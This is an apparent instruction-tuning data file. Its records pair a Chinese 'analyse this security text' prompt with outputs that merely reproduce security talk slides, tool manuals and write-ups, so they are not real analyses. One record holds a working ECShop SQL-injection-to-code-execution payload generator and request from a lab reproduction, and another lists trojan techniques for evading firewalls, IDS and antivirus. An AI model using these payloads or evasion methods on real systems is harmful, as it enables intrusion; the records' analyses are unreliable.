sensor, depending upon the ridges, pores and other details that are unique to each fingerprint. DEVICES TO TEST: CELLPHONES AND ATTENDANCE SYSTEMS Hysoon FF3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIf You Give A Mouse A Microchip It will execute a payload and cheat at your high-stakes video game tournament Mark Williams (skud) and Rob Stanley (Sky)  1958 - first video game  1972 - first recorded, sponsored video game tournament  Spacewar! - build in 1960s  Rolling Stone sponsored a Spacewar! Olympics in 72 Competitive Gaming Esports The International 2016  Teams from all over the world  20 million dollar prize pool (19 million crowd funded)  17,000 people watching at the venue  Over 20 million people watching online Esports  Massive temporary networks  Hot-seat computers  Internet connectivity  Support player-owned peripherals Security Challenges at Esports Events Computers at events typically close these attack vectors:  Internet access restricted  Player accounts dont have admin  Drivers / configs pre-installed  USB Mass Storage disabled  Extra USB ports disabled But you can plug your own mouse and keyboard into the PC! Potential Attack Vector  Found a mouse with an overpowered microcontroller  Not enough scrutiny over devices at esports tournaments Why Hack with a Mouse? Gaming Mouse Gaming Mouse  STMicro STM32F103CB Microcontroller  ARM Cortex M3microprocessor  Supports ST-Link programming interface  128KB Flash Memory  Stores user profiles onboard - save your dpi settings!  Lots of buttons  RGB LEDs  LCD screen  User customizable bitmaps 1. Connect to microcontroller built into the mouse. 2. Insert code to act as USB Keyboard. 3. Send keystrokes to execute payload on target computer 4. Unplug the keyboard app, run original mouse code 5. ??? 6. Profit Responsible disclosure Without obvious physical modifications to the mouse Hijack the Microcontroller Frequently Asked Question: Wait, isnt that just a Rubber Ducky in a mouse? Hang on a second ??? STMicro STM32F4 Discovery Development board  Has an onboard ARM Cortex M4 for initial dev  Has an external programming interface to program mouse Mouse with a ARM cortex processor Soldering Iron Wires Hardware Tool", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCover Your APIs: Securing Your Hidden Web Attack Surface WHITE PAPER Securing Your Hidden Web Attack Surface Cover Your APIs </> Cover Your APIs: Securing Your Hidden Web Attack Surface + The importance of web APIs and web services in software development + The challenges of including APIs in application security testing, and how to overcome them + The security and efficiency benefits of holistic AppSec Highlights from this white paper include: 2 Web application programming interfaces (APIs) present a huge  yet still underprotected  attack surface for cybercriminals. While application security testing has traditionally been focused on the user interface, modern applications rely heavily on APIs for data exchange and to build the application architecture. Todays enterprise web apps are no longer monolithic applications but rather constellations of loosely coupled services communicating through APIs, all subject to rapid development in response to shifting business requirements  and each a target in its own right. While these innovation pathways are crucial for growth, they also dramatically increase the web attack surface, leaving organizations exposed to attacks that target APIs in order to directly access sensitive data and functionality. As Gartner estimates, By 2023, 90% of web-enabled applications will have more surface area for attack in the form of exposed APIs rather than the user interface, up from 50% in 2020. It is therefore quite clear that application security testing must also cover APIs. However, legacy AppSec approaches havent kept pace with technical developments, leaving organizations struggling to reconcile multiple testing tools and processes  or altogether overlooking web application APIs in their security programs. With API abuses expected to become the top threat vector in 2022, continued neglect can only mean yet more successful cyberattacks. This white paper shows the importance of including APIs in web application security testing and outlin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRADAR JAMMING IS LEGAL IN THESE STATES Bill Swearingen / @hevnsnt Legend: RED ILLEGAL GREEN LEGAL WARNING THIS TALK IS ONLY LEGAL IN THE FOLLOWING STATES Legend: RED ILLEGAL GREEN LEGAL WARNING THIS TALK IS ONLY LEGAL IN THE FOLLOWING STATES This talk is rated R for: Super Good Ideas Marginal Advice Offensive Language Brief Nudity 23 Slides available now at bit.ly/23police SecKC Original Hacker MIRT * This is not my MIRT MIRT * This is not me HACKER HA /KC/ER HA/KC/ ER Excerpt from the Hackers Manifesto : The Mentor - Phrack Volume One, Issue 7, Phile 3 of 10 HA/KC/ ER Are you a cop? * This is not my car * This is not my problem WHAT IS RADAR? MY DAD IN THE 90s * This is not my dad http://hyperphysics.phy-astr.gsu.edu/hbase/Sound/radar.html *Where c is the speed of light From: https://www.vortexradar.com  X Band is in the 8.0 to 12.0 GHz range (most common is 10.5 in the US / 9.4-10.6 in EU)  K Band is in the 18 to 26.5 GHz range (most common is 24.12 - 24.17 in the US / 24.12 - 25.15 in EU)  Ka Band is in the 26.5 to 40 GHz range (most common is 33.8, 34.6, 34.7, 35.5, 35.7 GHz in the US / 34.0, 34.3, 35.5 in EU)  Ku Band is in the 12 to 18 GHz range (Ku is not used in the US, most common is 13.45 in Europe) LIVE DEMO http://hyperphysics.phy-astr.gsu.edu/hbase/Sound/radar.html Defeat X band radar at 10.50000203125Ghz Defeat K band radar at 24.12000466607143Ghz Confuse? Ka band radar at 33.80000653869047Ghz Microwave Oven 2.4Ghz = -97,420,118 mph + WE HAVE A PROBLEM good idea meter: RED good idea meter: RED WE HAVE A PROBLEM The Roads API returns the posted speed limit for a given road segment. + + good idea meter: RED Using a radar jammer is a federal offense that can result in a $50,000 fine and/or five years in prison. MIRT * This is still not me (LEGAL) EFFECTIVE COUNTERMEASURES  Uniden R3 or R7  Escort Max360  Radenso Pro M  Valentine One w/BT EFFECTIVE COUNTERMEASURES 3 LASER autoblog.com, 2011 \"The FCC doesn't regulate the light spectrum. That's done by the Foo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndircolors === 置ls命令在显示目录或文件时所用的色彩 ## 补充说明 **dircolors命令** 设置ls命令在显示目录或文件时所用的色彩dircolors可根据[色彩配置文件]来设置LS_COLORS环境变量或是显示设置LS_COLORS环境变量的命令 ### 语法 ```shell dircolors(选项)(参数) ``` ### 选项 ```shell -b或--sh或--bourne-shell显示在Boume shell中将LS_COLORS设为目前预设置的shell指令 -c或--csh或--c-shell显示在C shell中将LS_COLORS设为目前预设置的shell指令 -p或--print-database显示预设置 -help显示帮助 -version显示版本信息 ``` ### 参数 文件指定用来设置颜色的文件 ### 实例 ```shell [root@localhost ~]# dircolors -p # Configuration file for dircolors, a utility to help you set the # LS_COLORS environment variable used by GNU ls with the --color option. # The keywords COLOR, OPTIONS, and EIGHTBIT (honored by the # slackware version of dircolors) are recognized but ignored. # Below, there should be one TERM entry for each termtype that is colorizable TERM linux TERM linux-c TERM mach-color TERM console TERM con132x25 TERM con132x30 TERM con132x43 TERM con132x60 TERM con80x25 TERM con80x28 TERM con80x30 TERM con80x43 TERM con80x50 TERM con80x60 TERM cygwin TERM dtterm TERM putty TERM xterm TERM xterm-color TERM xterm-debian TERM rxvt TERM screen TERM screen-bce TERM screen-w TERM vt100 TERM Eterm # Below are the color init strings for the basic file types. A color init # string consists of one or more of the following numeric codes: # Attribute codes: # 00=none 01=bold 04=underscore 05=blink 07=reverse 08=concealed # Text color codes: # 30=black 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 37=white # Background color codes: # 40=black 41=red 42=green 43=yellow 44=blue 45=magenta 46=cyan 47=white NORMAL 00 # global default, although everything should be something. FILE 00 # normal file DIR 01;34 # directory LINK 01;36 # symbolic link. (If you set this to 'target' instead of a # numerical value, the color is as for the file pointed to.) FIFO 40;33 # pipe SOCK 01;35 # socket DOOR 01;35 # door BLK 40;33;01 # block device driver CHR 40;33;01 # character device driver ORPHAN 40;31;01 # symlink to nonexistent file SETUID 37;41 # file that is setuid (u+s) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ECShop 2.x/3.x SQL注入/任意代码执行漏洞 ECShop是一款B2C独立网店系统适合企业及个人快速构建个性化网上商店系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序 其2017年及以前的版本中存在一处SQL注入漏洞通过该漏洞可注入恶意数据最终导致任意代码执行漏洞其3.6.0最新版已修复该漏洞vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现 参考链接 - https://paper.seebug.org/691/ ## 环境搭建 执行如下命令启动ecshop 2.7.3与3.6.0 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8080`将看到2.7.3的安装页面访问`http://your-ip:8081`将看到3.6.0的安装页面 依次安装二者mysql地址填写`mysql`mysql账户与密码均为`root`数据库名随意填写但2.7.3与3.6.0的数据库名不能相同如图 ![](0.png) ## 漏洞复现 我编写了一个脚本可以生成2.x和3.x的POC ```php <?php $shell = bin2hex(\"{\\$asd'];phpinfo\\t();//}xxx\"); $id = \"-1' UNION/*\"; $arr = [ \"num\" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell), \"id\" => $id ]; $s = serialize($arr); $hash3 = '45ea207d7a2b68c49582d2d22adf953a'; $hash2 = '554fcae493e564ee0dc75bdf2ebf94ca'; echo \"POC for ECShop 2.x: \\n\"; echo \"{$hash2}ads|{$s}{$hash2}\"; echo \"\\n\\nPOC for ECShop 3.x: \\n\"; echo \"{$hash3}ads|{$s}{$hash3}\"; ``` 生成的POC放在Referer里发送 ``` GET /user.php?act=login HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1 Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:107:\"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}45ea207d7a2b68c49582d2d22adf953a Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` 2.x的执行结果 ![](1.png) 3.x的执行结果 ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWorld War 3.0 Chaos, Control & The Battle for the Net DEFCON 20 World War 3.0 Chaos, Control & The Battle for the Net DEFCON 20 ABSTRACT: There is a battle under way for control of the Internet. Some see it as a fight between forces of Order (who want to superimpose existing, pre-digital power structures and their notions of privacy, intellectual property, security, and sovereignty onto the Net) and forces of Disorder (who want to abandon those old structures and let the will of the crowd control a new global culture). Yet this binary view of the conflict excludes the characters with the best chance of resolving it: those who know that control is impossible and chaos is untenable, a group that Vanity Fair, in an article called \"World War 3.0,\" called \"the forces of Organized Chaos.\" This panel gathers leading proponents of that worldview to discuss urgent issues of Internet governance, which may come to a head later this year in a Dubai meeting of the U.N.'s International Telecommunications Union. If government control and anarchistic chaos online are unacceptable, what exactly do the forces of organized chaos propose as an alternative? And what is the DefCon community's role in helping to realize that vision of the Net?. The Writer Michael J Gross @M_J_Gross The Architect Vint Cerf [not present] The Boundary Spanner Jeff Moss @TheDarkTangent The Philosopher Joshua Corman @JoshCorman The Key Master Dan Kamnisky @dakami The Ambassador Rod Beckstrom @RodBeckstrom Organized Chaos Control and Chaos World War 3.0 by Michael Joseph Gross Vanity Fair - May 2012 Tyranny or Chaos... Does not one cause the other? Its a Trap on shirt.woot.com 1914 Resources World War 3.0 in Vanity Fair May 2012 http://www.vanityfair.com/culture/2012/05/internet- regulation-war-sopa-pipa-defcon-hacking Building a Better Anonymous by @JoshCorman & @attritionorg http://blog.cognitivedissidents.com/2011/12/20/building-a- better-anonymous-series-part-0/ We Are Legion: The Story of the Hacktivists D", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMartin Holst Swende  @mhswende  Patrik Karlsson  @nevdull77  Is very diverse: from a low-level infrastructure point-of-view to high-level application flow  There are many tools, but a central component is an intercepting proxy  Usually complex beasts Feature Requirement Must be in proxy? Possible alternatives Sitemapping Traffic data No Http-level: trivial. Based on html inspection : e.g. in browser DOM javascript. Content analysis Traffic data No W3af, ratproxy, proxmon, webscarab, burp etc Fuzzing Traffic data No JBroFuzz Spidering Traffic data No Browser-based spiders with DOM- access. Many choices. Interception Live traffic Yes None Manual request Traffic data + sockets No An http/html/json/xml editor + sockets Manual inspect Traffic data No An http/html/json/xml editor Sess. id analysis Traffic data No Stompy Search Traffic data No Wide range: grep to lucene  It hogs my machine  Oh noes: OS updates itself through the proxy  They usually dont perform well after a few thousand requests  It is not flexible  Ok, I see the GET-params in the overview.  but now I want to see the POST  params   and now I want to see which of my browsers sent it   and now I want to see all Server-headers. Ordered by path.   and now I only want to see responses with content type application/json and the value of the json parameter foobar.  And whats with all these cookies eating my screen real estate?  It is not open  I wonder if <tool> wouldve detected that internal ip address?  Lets chain it: Webscarab, Burp, Paros and Ratproxy  The road to madness  Write an intercepting proxy  Lightweight  Memory-consumption does not grow with traffic  Streams all non-captured traffic to destination asap  Recording  Saves to database - MongoDB  Document store where parsed data is stored as JSON documents  Platform independent, Open Source and fast  Write an analysis engine  Flexible  Using MongoDB advanced querying facilities  Using dynamic views for data  And open  With several different ways to anal", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ngroupadd === 用于创建一个新的工作组 ## 补充说明 **groupadd命令** 用于创建一个新的工作组新工作组的信息将被添加到系统文件中 ### 语法 ```shell groupadd(选项)(参数) ``` ### 选项 ```shell -g指定新建工作组的id -r创建系统工作组系统工作组的组ID小于500 -K覆盖配置文件/etc/login.defs -o允许添加组ID号不唯一的工作组 ``` ### 参数 组名指定新建工作组的组名 ### 实例 建立一个新组并设置组ID加入系统 ```shell groupadd -g 344 jsdigname ``` 此时在`/etc/passwd`文件中产生一个组IDGID是344的项目", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# WOL-E软件包描述 WOL-E是一套利用计算机网络唤醒Wake on LAN--WOL功能的工具该功能现在在许多Apple电脑上默认启用这些工具包括 - 强制用MAC地址唤醒客户端 - 嗅探网络上的WOL请求并将其保存到磁盘 - 嗅探网络上的WOL密码并将其保存到磁盘 - 唤醒单个客户端嗅探攻击 - 扫描网络上启用WOL功能的Apple设备 - 向所有检测到的Apple客户端发送批量WOL请求 资料来源[https://code.google.com/p/wol-e/](https://code.google.com/p/wol-e/) [WOL-E首页](http://code.google.com/p/wol-e/)| [Kali WOL-E资源](http://git.kali.org/gitweb/?p=packages/wol-e.git;a=summary) - 作者Nathaniel Carew - 许可证GPLv3 ## WOL-E包含的工具 ### wol-e - 网络唤醒浏览器 ``` root@kali:~# wol-e -h [*] WOL-E 1.0 [*] Wake on LAN Explorer - A collection a WOL tools. [*] by Nathaniel Carew -m 唤醒单个电脑 如果需要密码请在上述命令的末尾使用-k 00:12:34:56:78:90 wol-e -m 00:12:34:56:78:90 -b 192.168.1.255 -p <端口> -k <密码> 默认值 端口9 广播地址255.255.255.255 密码空 -s 嗅探网络上的WOL请求和密码 所有捕获的WOL请求将显示在屏幕上并写入/usr/share/wol-e/WOLClients.txt wol-e -s -i eth0 -a 强制WOL客户端开机 wol-e -a -p <端口> 将希望强制开机的地址范围放在bfmac.lst文件中 它们应采用以下格式 00:12:34:56 默认端口9 -f 检测网络上启用WOL功能的Apple设备 检测到的Apple MAC地址将输出到屏幕并写入/usr/share/wol-e/AppleTargets.txt wol-e -f -fa 尝试唤醒所有记录在/usr/share/wol-e/AppleTargets.txt中的Apple目标 这将向列表中的每个客户端发送一个WOL数据包并告诉您尝试了多少客户端 wol-e -fa ``` ## wol-e使用示例 检测联网的Apple设备-f ``` root@kali:~# wol-e -f [*] WOL-E 1.0 [*] [*] Wake on LAN Explorer - Scan for Apple devices. [*] arping 192.168.1.0/24 on eth0 [*] Apple device detected: de:ad:be:ef:46:32 192.168.1.12. saving to AppleTargets.txt ``` 原文链接[http://tools.kali.org/information-gathering/wol-e](http://tools.kali.org/information-gathering/wol-e)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n特种木马攻击与溯源 天融信阿尔法实验室 冷风 你可以了解到 特种木马的一些特性 1 2 攻击溯源的一些思路 目录 穿透ISA代理及硬件代理 1 2 绕过流量监控及地址检测 3 使用多协议进行内容穿透 协议加密穿透IPS/IDS 4 5 使用隧道穿透单机防火墙 对抗虚拟机检测 6 7 对抗启发式检测 8 目前杀软的软肋 我们的对手是谁 1 2 如何发现特种木马 3 基于二进制的分析 基于IP的分析 4 5 基于蜜罐的分析 6 一层VPN的溯源 2 溯源之难 怎么定义特种木马? 特种木马对网络的穿透性 穿透ISA代理及硬件代理 1 2 绕过流量监控及地址检测 3 使用多协议进行内容穿透 协议加密穿透IPS/IDS 4 5 使用隧道穿透单机防火墙 穿透代理 绕过流量监控和恶意地址检测 把数据传到公共网络逃避恶意地址检测和流量检测 采用多种协议穿透 一般会使用应用协议如HTTP DNS 等 协议加密绕过IPS/IDS防火墙 一般公开的RAT程序通信特性会被加入规则库 插入白名单程序绕单机防火墙 注入防火墙默认允许通讯的进程 与杀毒软件的对抗 对抗虚拟机检测 1 2 对抗启发式检测 3 目前杀软的软肋 对抗虚拟机检测 搜索虚拟环境中的进程文件系统注册表 1 2 搜索虚拟环境中的内存 3 搜索虚拟环境中的特定虚拟硬件 4 搜索虚拟环境中的特定处理器指令和功能 对抗启发式检测 把功能做成shellcode或者使用动态获取api针对启发式面杀效果好 或者把恶意代码糅合和庞大的开源项目也会有好的逃逸效果 目前杀软的软肋 恶意程序利用第三方的白名单程序是杀毒软件的一个软肋 特种木马的溯源 我们的对手是谁 1 2 如何发现特种木马 3 基于二进制的分析 基于IP的分析 4 5 基于蜜罐的分析 6 一层VPN的溯源 溯源之难 隐藏成本底 1 2 VPN盛行国与国之间协调困难 我们的对手是谁 引用兰德报告的一段话 如何发现特种木马 有大量样本数据 1 2 对大量数据的甄别能力 基于调试信息的溯源 编译器会记录你的信息 基于IP的一个溯源案例 有一个服务商的名字为DomainTools它拥有12年的 历史记录包括对域名的所有权域名注册记录托管 数据截图和其他DNS记录等信息 基于蜜罐的分析 蜜罐溯源的小思路 在各种文档中插入一些引用网络的资源如图片 一层VPN的溯源 对抗云技术检测 网络出入口是否有日志可查是关键所在 基于日志的分析 日志分析的难点 主要在于攻击指纹确定以及大量日志联动分析 日志分析案例 例如 攻击者在攻击过程中VPN出现断线情况 谢谢观看 天融信 我的联系方式qq: 121 121 606", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHITB Write Up CTYPTO HASHINATOR python脚本: #! /usr/bin/env python3 # -*- coding: utf-8 -*- import re import os import hashlib import struct import time from base64 import b64encode from pwn import * context.log_level = \"debug\" def md5(bytestring): return hashlib.md5(bytestring).digest() def sha(bytestring): return hashlib.sha1(bytestring).digest() def blake(bytestring): return hashlib.blake2b(bytestring).digest() def scrypt(bytestring): l = int(len(bytestring) / 2) salt = bytestring[:l] p = bytestring[l:] return hashlib.scrypt(p, salt=salt, n=2**16, r=8, p=1, maxmem=67111936) def xor(s1, s2): return b''.join([bytes([s1[i]  s2[i % len(s2)]]) for i in range(len(s 1))]) def generate_password(): return os.urandom(64) def generate_salt(p): msize = 128 # f-you hashcat :D salt_size = msize - len(p) return os.urandom(salt_size) def generate_rounds(): hashes = [md5, sha, blake, scrypt] rand = struct.unpack(\"Q\", os.urandom(8))[0] rounds = [] for i in range(32): rounds.append(hashes[rand % len(hashes)]) rand = rand >> 2 return rounds def calculate_hash(payload, hash_rounds): interim_salt = payload[:64] interim_hash = payload[64:] for i in range(len(hash_rounds)): interim_salt = xor(interim_salt, hash_rounds[-1-i](interim_hash)) interim_hash = xor(interim_hash, hash_rounds[i](interim_salt)) final_hash = interim_salt + interim_hash return final_hash def generate_delay(self): rand = struct.unpack(\"I\", os.urandom(4))[0] time.sleep(rand / 1000000000.0) def test(): password = generate_password() print(\"password: %s\"%password) salt = generate_salt(password) print(\"salt: %s\"%salt) hash_rounds = generate_rounds() password_hash = calculate_hash(salt + password, hash_rounds) r_pass = restore(password_hash, hash_rounds) print(r_pass == password) def restore(password_hash, hash_rounds): salt = password_hash[:64] ihash = password_hash[64:] for i in range(32): ihash = xor(ihash, hash_rounds[-1-i](salt)) salt = xor(salt, hash_rounds[i](ihash)) print(\"restore data: %s\"%(salt+ihash)) return ihas", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n技 术 标 准 研发运营一体化能力成熟度模型 第 1 部分总体架构 The DevOps capability maturity model Part 1: General architecture 征求意见稿 2017 年 11 月 18 日 YDB XXXXXXXXX I 目 次 目次................................................................................... I! 前言.................................................................................. II! 1 范围 ............................................................................... 1! 2 规范性引用文件 ..................................................................... 1! 3 术语 ............................................................................... 1! 4 缩略语 ............................................................................. 1! 5 总体架构 ........................................................................... 1! 附录 A ................................................................................. 4! YDB XXXXXXXXX II 前! ! 言 研发运营一体化是指在 IT 软件及相关服务的研发及交付过程中将应用的需求开发测试部 署和运营统一起来基于整个组织的协作和应用架构的优化实现敏捷开发持续交付和应用运营的无 缝集成帮助企业提升 IT 效能在保证稳定的同时快速交付高质量的软件及服务灵活应对快速变 化的业务需求和市场环境 本标准是研发运营一体化能力成熟度模型系列标准的第 1 部分该系列标准的结构和名称如 下  第 1 部分总体架构  第 2 部分敏捷开发管理过程  第 3 部分持续交付过程  第 4 部分技术运营过程  第 5 部分应用架构  第 6 部分安全管理  第 7 部分组织结构 本标准按照 GB/T 1.1-2009 给出的规则起草 本标准由中国通信标准化协会提出并归口 本标准起草单位 DevOps 时代社区高效运维社区中国信息通信研究院上海仪电中央研究院 本标准主要起草人 萧田国张乐景韵栗蔚杨天顺 1 研发运营一体化能力成熟度模型 第 1 部分总体架构 1 范围 本标准规定了研发运营一体化的概念范围总体架构及能力成熟度模型本标准中的研发运营一体 化包括IT软件及服务的需求开发测试部署和运营五个环节并实现敏捷开发持续交付和技术运 营的顺序闭环集成 本标准适用于企业在实施IT软件开发和服务过程中实现研发运营一体化架构提升IT效能 2 规范性引用文件 下列文件中的条款通过本部分的引用而成为本部分的条款凡是注日期的引用文件仅所注日期的 版本适用于本文件凡是不注日期的引用文件其最新版本包括所有的修改单适用于本文件 [1] GB/T 32400-2015 信息技术 云计算 概览与词汇 [2] GB/T 32399-2015 信息技术 云计算 参考架构 [3] YD/T2441-2013 互联网数据中心技术及分级分类标准 [4] GB/T 33136-2016 信息技术服务数据中心服务能力成熟度模型 3 术语 下列术语和定义适用于本文件 3.1 部署流水线 deployment pipeline 指软件从版本控制库到用户手中这一过程的自动化表现形式 4 缩略语 下列缩略语适用于本文件 CI Continuous Integration 持续集成 CD Continuous Delivery 持续交付 5 总体架构 2 图 1 研发运营一体化DevOps标准总体架构 研发运营一体化DevOps能力成熟度模型覆盖端到端软件交付生命周期全流程是一套体系化的 方法论实践和标准的集合研发运营一体化总体架构可划分为三部分即过程敏捷开发管理持续 交付技术运营应用架构和组织结构研发运营一体化过程相关内容如下 1敏捷开发管理从需求管理计划管理过程管理度量分析这四个维度关注需求到开发阶段 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@Y4tacker 两个好玩的问题 1.为什么往 /WEB-INF/tomcat-web.xml/ /WEB-INF/tomcat-web.xml/ 件夹下写东西可以触发重加载 问题来源 问题的切来源于句话 Trigger a reload of the web app by writing any file to /WEB-INF/tomcat-web.xml/ 件夹 什么 当然多提嘴不是每个版本这个tomcat-web.xml都效的具体看配置详细的往下看 解决 先既然能够在tomcat运后继续加载新的jar到jvm如果是你会怎么实现呢答案很显然 多线程定时让个进程去监控件的变化tomcat也是如此具体的就不多说了也不是 本篇的重点这只是简单提嘴 关于本篇要探索的问题我本来也确实不清楚但是昨天看到句话 嗯看到这个我愣了下因为在我第认知都是上说的web.xml这个加了个前缀 tomcat又是什么并且为什么创建录也能被识别到内容变化呢(今天位师傅与我讨论) 先谈谈我的第想法我开始猜测是扫描到这个 /WEB-INF/tomcat-web.xml/ ,发现是 录是不是就去通过遍历录下的件内容看是否有变化呢 但是答案是No我跟了下源码这我们节约时间从关键的说 起 org.apache.catalina.startup.HostConfig#checkResources , 我们来看看checkResources是嘛的会去检查哪些资源这也很清楚了 我们这研究的是 /WEB-INF/tomcat-web.xml/ 继续往下看 往下看关注下 光看lastModified我就概猜到了是靠什么机制了没错时间戳当前件夹下的件变动了 然也会影响件夹的时间戳变化不过都来了当然还是进去看看嘛 Trigger a reload of the web app by writing any file to `/WEB-INF/tomcat- web.xml/` long lastModified = app.reloadResources.get(s).longValue(); 确实如此后通过reload也就重新将 /WEB-INF/lib 下的jar加载进去了昨天提过这不再 多讲 好了到了这又是个问题刚才我们的资源路径是怎么取得的 app.reloadResources 这值是怎么来的呢其实是在tomca次运时就设置了 在 org.apache.catalina.core.StandardContext#addWatchedResource 中便引了 那值是哪来的在 项路径/conf/context.xml 哦切也就解决了通过配置WatchedResource来监视这也是默认名称 2.Tomcat下/META-INF/lib中被加载的jar如果在其/META- INF/resources/下直接写jsp可以直接访问执 <Context> <WatchedResource>WEB-INF/web.xml</WatchedResource> <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource> <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource> </Context> 问题来源 很骚的东西第次看到马上吃饭了简单看了下 先概说下浏览器敲下 htttp://xxx/xx.jsp时候 它会检查jsp件是否存在来避免创 建垃圾件夹和件也就是在 org.apache.jasper.servlet.JspServlet#serviceJspFile 下的 往直跟最终个关键的点 在 org.apache.catalina.webresources.CachedResource#validateResource 下 这个JarResource有映射关系我们简简单单看看webResource咋来的 if (null == context.getResource(jspUri)) { 这只是初始化其他地也没有 后找了下 在 org.apache.jasper.servlet.JspCServletContext#scanForResourceJARs 找到了 答案 拿下", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 前言 **本指南/教程将从以下几个方面展开:** * 搭建一个虚拟的活动目录(Active Directory)域实验环境 * 凭证重放攻击 * 域权限提升 * Dump系统和域秘钥 * Empire, Bloodhound和ranger等工具的使用 * 实际渗透测试案例 如果你对上面的内容感到不知所措那么我推荐你先看一下[Windows的哈希](https://github.com/crazywa1ker/DarthSidious-Chinese/blob/c6a34e54bf4195829a27866986287e2e44540975/getting-started/intro-to-windows-hashes.md)之后再开始阅读[搭建实验环境](https://github.com/crazywa1ker/DarthSidious-Chinese/blob/c6a34e54bf4195829a27866986287e2e44540975/BUILDING-A-LAB/%E6%9E%84%E5%BB%BA%E4%B8%80%E4%B8%AA%E5%B1%9E%E4%BA%8E%E4%BD%A0%E7%9A%84%E5%9F%9F%E6%B8%97%E9%80%8F%E7%8E%AF%E5%A2%83.md) 如果你已经清楚以上的内容并且已经搭建好了一套实验环境那么我建议你直接看[Network access to Domain Admin](https://github.com/crazywa1ker/DarthSidious-Chinese/blob/c6a34e54bf4195829a27866986287e2e44540975/getting-started/external-network-access-to-domain-admin.md)的内容去了解攻击Active Directory域的一般方法 **免责声明** 未经其合法所有者的完全授权不得在未经授权的环境中使用本书中演示的工具也不要在懵逼状态下去运行那些你不清楚含义的命令 **待办事项清单** * 进一步修改文章 * 对Active Directory的简介 * AD中的Kerberos和身份认证等内容 * 对PowerShell的简介 * 攻击MSSQL Servers的内容 * 客户端攻击 * 域枚举和信息收集 * 本地特权升级 * 交换枚举和攻击 * Sharepoint枚举和攻击 * 针对常见攻击的防御措施 * AD安全的一般性建议 **未来的计划** * 对Kerberos的攻击和防御 \\(黄金白银票据 攻击等\\) * 委派问题 * 持久性技术 * AD环境中SQL Server凭信滥用问题 * 后门命令与控制 * AD中林和域的信任 * 攻击检测技术 * Active Directory环境的防御 * [攻击域信任凭据](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/) * LDAP与非Microsoft产品的集成", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nATTACKING NETWORK INFRASTRUCTURE TO GENERATE A 4 TB/S DDOS FOR $5 by Luke Young $ WHOAMI  Undergraduate Student - Junior  2nd year at DEF CON  Website: bored.engineer  Email: me@bored.engineer  LinkedIn: https://www.linkedin.com/in/bored-engineer  Twitter: @TheBoredEng DISCLAIMER  The views and opinions expressed in this presentation are those of the authors and do not necessarily reflect the official policy or position of any current or previous employer. Examples of exploitation performed within this presentation are only examples and they should not be utilized in the real-world. AGENDA  What is Internet2?  What is perfSONAR?  Exploiting perfSONAR  Privilege Escalation to root  Enumerating perfSONAR Instances  Code Release and Q&A BACKSTORY  The Internet is a global system of interconnected networks. The University connects to both the global Internet and a number of special research and education networks commonly referred to as Internet2. These networks provide high bandwidth connectivity enabling and supporting research collaborations and educational opportunities regionally, nationally, and around the world. WHAT IS A INTERNET2?  Internet2 is an exceptional community of U.S. and international leaders in research, academia, industry and government who create and collaborate via innovative technologies. Together, we accelerate research discovery, advance national and global education, and improve the delivery of public services.  282 - Higher Education  86 - Corporations  66 - Affiliate members (Governments)  42 - Regional and State Education Networks  Lookout  Office 365  Rackspace  SoftLayer  Splunk  VMWare  Zoom WHAT IS A INTERNET2?  AWS  Azure  Box  Dropbox  DocuSign  Duo Security  LastPass WHAT IS A INTERNET2? INTERNET2 PRODUCTS  Trust Identity & Middleware  InCommon Federation  Shibboleth  Performance & Analytics  BWCTL - Bandwidth Test Controller  NDT - Network Diagnostic Tool  OWAMP - One-Way Ping  perfSONAR - pS-Performance Toolkit 